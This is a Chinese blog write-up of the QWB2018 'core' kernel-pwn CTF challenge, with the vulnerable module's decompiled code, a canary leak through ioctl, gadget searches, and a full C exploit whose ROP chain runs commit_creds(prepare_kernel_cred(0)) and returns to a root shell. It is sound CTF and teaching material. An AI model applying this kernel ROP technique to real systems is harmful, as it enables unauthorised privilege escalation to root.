[kernel pwn] QWB2018-core

前面做了一道kernel-uaf的題打掘,接著復(fù)現(xiàn)一下kernel-rop的題目

環(huán)境分析

  • 首先按照kernel pwn的套路,先解壓core.cpio文件,查看init文件
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2 
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f
  • 從腳本中可以看到有我們需要分析的模塊文件是core.ko,然后還有條定時關(guān)機的命令(poweroff -d 120 -f &),為了不影響我們調(diào)試评矩,所以把這條命令刪掉再重打包,/tmp目錄下有一個符號文件kallsyms阱飘,可以leak出內(nèi)核信息斥杜,找到commit_credsprepare_kernel_cred的地址
./gen_cpio.sh core.cpio
  • 啟動時候發(fā)現(xiàn)有報錯,是因為分配的內(nèi)存過小沥匈,將start.sh 中-m分配的64M修改為128M即可
 Kernel panic - not syncing: Out of memory and no killable processes...

模塊分析

  • 首先看開了什么保護
?  give_to_player  checksec core.ko 
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)
  • 然后ida分析蔗喂,core_copy_func函數(shù)的參數(shù)是signed __int64而qmemcpy的函數(shù)是unsigned __int16,當(dāng)傳入?yún)?shù)a1為負數(shù)會產(chǎn)生溢出高帖,將我們的rop鏈拷貝到棧上
signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
  signed __int64 result; // rax
  __int64 v2; // [rsp+0h] [rbp-50h]
  unsigned __int64 v3; // [rsp+40h] [rbp-10h]

  v3 = __readgsqword(0x28u);
  printk(&unk_215);
  if ( a1 > 63 )
  {
    printk(&unk_2A1);
    result = 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(&v2, &name, (unsigned __int16)a1);
  }
  return result;
}
  • core_ioctl函數(shù)可以控制全局變量off缰儿,而core_read會根據(jù)off的偏移來拷貝 64 個字節(jié)到用戶空間,我們可以控制off來leak canary和一些地址
__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
  signed __int64 v3; // rbx

  v3 = a3;
  switch ( a2 )
  {
    case 1719109787:
      core_read(a3);
      break;
    case 1719109788:
      printk(&unk_2CD);
      off = v3;
      break;
    case 1719109786:
      printk(&unk_2B3);
      core_copy_func(v3);
      break;
  }
  return 0LL;
}

unsigned __int64 __fastcall core_read(__int64 a1)
{
  __int64 v1; // rbx
  __int64 *v2; // rdi
  signed __int64 i; // rcx
  unsigned __int64 result; // rax
  __int64 v5; // [rsp+0h] [rbp-50h]
  unsigned __int64 v6; // [rsp+40h] [rbp-10h]

  v1 = a1;
  v6 = __readgsqword(0x28u);
  printk(&unk_25B);
  printk(&unk_275);
  v2 = &v5;
  for ( i = 16LL; i; --i )
  {
    *(_DWORD *)v2 = 0;
    v2 = (__int64 *)((char *)v2 + 4);
  }
  strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
  result = copy_to_user(v1, (char *)&v5 + off, 64LL);
  if ( !result )
    return __readgsqword(0x28u) ^ v6;
  __asm { swapgs }
  return result;
}
  • core_write讓我們對name進行寫入散址,通過core_write和core_copy_func函數(shù)實現(xiàn)寫入rop_chain
signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  unsigned __int64 v3; // rbx

  v3 = a3;
  printk(&unk_215);
  if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
    return (unsigned int)v3;
  printk(&unk_230);
  return 4294967282LL;
}

利用思路

  1. 通過 ioctl 設(shè)置 off乖阵,然后通過 core_read() leak 出 canary
  2. 通過 core_write() 向 name 寫宣赔,構(gòu)造 ropchain
  3. 通過 core_copy_func() 從 name 向局部變量上寫,通過設(shè)置合理的長度和 canary 進行 rop
  4. 通過 rop 執(zhí)行 commit_creds(prepare_kernel_cred(0))
  5. 返回用戶態(tài)瞪浸,通過 system(“/bin/sh”) 等起 shell

編寫exp

  1. 編寫exp的時候還要邊調(diào)試儒将,下圖是調(diào)試尋找泄漏canary的偏移,由圖可知道canary距離rsp的偏移是0x40对蒲,返回地址的偏移是0x50
  1. 接下來是找覆蓋返回地址的偏移钩蚊,由圖可知返回地址偏移是0x50
  1. 找gadget的偏移,不能從帶符號的vmlinux里面找gadget,要從bzImage里面提取之后再找gadget齐蔽,先用extract-vmlinux提取文件出來两疚,再用ropper找gadegt
?  give_to_player  ./extract-vmlinux ./bzImage > rop_gadget
?  give_to_player  ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret

[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff; 
0xffffffff817f8da2: pop rdx; ret 0xa0; 
0xffffffff817023a4: pop rdx; ret 0xebff; 
0xffffffff810a0f49: pop rdx; ret;

?  give_to_player  bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0xffffffff81000000)
    RWX:      Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'
  1. 寫exp床估,這里直接套用charlie師傅的exp
//gcc exp.c -o exp -static -masm=intel
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <string.h>


size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}

void binsh()
{
    system("/bin/sh");
}

int main()
{
    save_status();
    void* commit_creds;
    void* base_addr;
    void* prepare_kernel_cred;
    
    FILE* base=popen("grep startup_64 /tmp/kallsyms |awk -F' ' '{print $1}'","r");
    fscanf(base,"%p",&base_addr);
    commit_creds=base_addr+0x9c8e0;
    prepare_kernel_cred=base_addr+0x9cce0;

    printf("commit_creds is %p \nbase is %p \nprepare is %p\n",commit_creds,base_addr,prepare_kernel_cred);

    fclose(base);
    
    int fd = open("/proc/core",O_WRONLY);

    if(fd<0)
    {
        printf("open core failed\n");
        exit(-1);
    }

    ioctl(fd,0x6677889C,0x40); //set offset
    long long canary[0x10];
    ioctl(fd,0x6677889B,canary); //get canary
    printf("ret addr is %lx\n",canary[2]);
    long long payload[0x40];
   
     
    payload[8]=canary[0]; //canary
    payload[9]=canary[1]; //rbp

    void* mov_rdi_rax_jmp_rdx=base_addr+0x6a6d2;
    void* prdx=base_addr+0xa0f49;
    void* prdi=base_addr+0xb2f;
    void* swapgs=base_addr+0xa012da;
    void* iretq=base_addr+0x50ac2;

    int i=10;
    payload[i++]=prdi; //pop rdi;
    payload[i++]=0;
    payload[i++]=prepare_kernel_cred; //prepare_kernel_cred(0);
    payload[i++]=prdx; //pop rdx;
    payload[i++]=commit_creds; //commit_creds(prepare_kernel_cred(0));
    payload[i++]=mov_rdi_rax_jmp_rdx; //mov rdi, rax; call rdx;
    payload[i++]=swapgs; //swapgs; popfq; ret
    payload[i++]=0;
    payload[i++]=iretq; //iretq; ret; 
    payload[i++]=(size_t)binsh;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_sp;
    payload[i++] = user_ss;

    write(fd,payload,0x200);
    long long v=0xffffffffffff0000 | (0x100);
    ioctl(fd,0x6677889A,v);
    return 0;
}
  1. 編譯exp含滴,然后重打包fs,啟動系統(tǒng)丐巫,運行exp
?  give_to_player  gcc exp.c -o exp -static -masm=intel
?  give_to_player  cd core
?  core  ./gen_cpio.sh core.cpio
?  core  cp ./core.cpio ../
?  core  cd ..
?  give_to_player  ./start.sh 
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0 
base is 0xffffffffbd200000 
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ # 

參考文章:

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末谈况,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子递胧,更是在濱河造成了極大的恐慌碑韵,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,482評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件缎脾,死亡現(xiàn)場離奇詭異祝闻,居然都是意外死亡,警方通過查閱死者的電腦和手機遗菠,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評論 2 382
  • 文/潘曉璐 我一進店門联喘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人辙纬,你說我怎么就攤上這事豁遭。” “怎么了贺拣?”我有些...
    開封第一講書人閱讀 152,762評論 0 342
  • 文/不壞的土叔 我叫張陵蓖谢,是天一觀的道長。 經(jīng)常有香客問我譬涡,道長闪幽,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,273評論 1 279
  • 正文 為了忘掉前任涡匀,我火速辦了婚禮盯腌,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘渊跋。我一直安慰自己腊嗡,他們只是感情好着倾,可當(dāng)我...
    茶點故事閱讀 64,289評論 5 373
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著燕少,像睡著了一般卡者。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上客们,一...
    開封第一講書人閱讀 49,046評論 1 285
  • 那天崇决,我揣著相機與錄音,去河邊找鬼底挫。 笑死恒傻,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的建邓。 我是一名探鬼主播盈厘,決...
    沈念sama閱讀 38,351評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼官边!你這毒婦竟也來了沸手?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 36,988評論 0 259
  • 序言:老撾萬榮一對情侶失蹤注簿,失蹤者是張志新(化名)和其女友劉穎契吉,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體诡渴,經(jīng)...
    沈念sama閱讀 43,476評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡捐晶,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,948評論 2 324
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了妄辩。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片惑灵。...
    茶點故事閱讀 38,064評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖恩袱,靈堂內(nèi)的尸體忽然破棺而出泣棋,到底是詐尸還是另有隱情,我是刑警寧澤畔塔,帶...
    沈念sama閱讀 33,712評論 4 323
  • 正文 年R本政府宣布潭辈,位于F島的核電站,受9級特大地震影響澈吨,放射性物質(zhì)發(fā)生泄漏把敢。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,261評論 3 307
  • 文/蒙蒙 一谅辣、第九天 我趴在偏房一處隱蔽的房頂上張望修赞。 院中可真熱鬧,春花似錦、人聲如沸柏副。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽割择。三九已至眷篇,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間荔泳,已是汗流浹背蕉饼。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留玛歌,地道東北人昧港。 一個月前我還...
    沈念sama閱讀 45,511評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像支子,于是被迫代替她去往敵國和親创肥。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,802評論 2 345

推薦閱讀更多精彩內(nèi)容